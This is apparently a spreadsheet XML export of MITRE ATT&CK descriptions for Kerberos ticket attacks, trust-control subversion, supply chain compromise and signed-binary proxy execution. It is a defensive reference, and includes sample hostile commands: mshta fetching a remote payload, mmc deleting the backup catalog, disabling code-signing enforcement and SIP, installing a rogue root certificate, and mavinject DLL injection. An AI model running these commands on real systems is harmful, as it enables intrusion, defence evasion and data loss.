    <t xml:space="preserve">Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in &lt;code&gt;klist&lt;/code&gt; utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in &lt;code&gt;/var/lib/sss/secrets/secrets.ldb&lt;/code&gt; as well as the corresponding key located in &lt;code&gt;/var/lib/sss/secrets/.secrets.mkey&lt;/code&gt;. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the &lt;code&gt;/etc/krb5.conf&lt;/code&gt; configuration file and the &lt;code&gt;KRB5CCNAME&lt;/code&gt; environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using &lt;code&gt;kinit&lt;/code&gt;, &lt;code&gt;klist&lt;/code&gt;, &lt;code&gt;ktutil&lt;/code&gt;, and &lt;code&gt;kcc&lt;/code&gt; built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:
1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)
2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.
3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.
4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.
Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)
Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.
Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as &lt;code&gt;split&lt;/code&gt; to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, &lt;code&gt;mmc C:\Users\foo\admintools.msc /a&lt;/code&gt; will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is &lt;code&gt;mmc gpedit.msc&lt;/code&gt;, which will open the Group Policy Editor application window. 
Adversaries may use MMC commands to perform malicious tasks. For example, &lt;code&gt;mmc wbadmin.msc delete catalog -quiet&lt;/code&gt; deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: &lt;code&gt;wbadmin.msc&lt;/code&gt; may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: &lt;code&gt;mmc.exe -Embedding C:\path\to\test.msc&lt;/code&gt;.(Citation: abusing_com_reg)</t>
  </si>
  <si>
    <t>Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. &lt;code&gt;C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. 
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  &lt;code&gt;/HMODULE&lt;/code&gt; command-line parameter (ex. &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
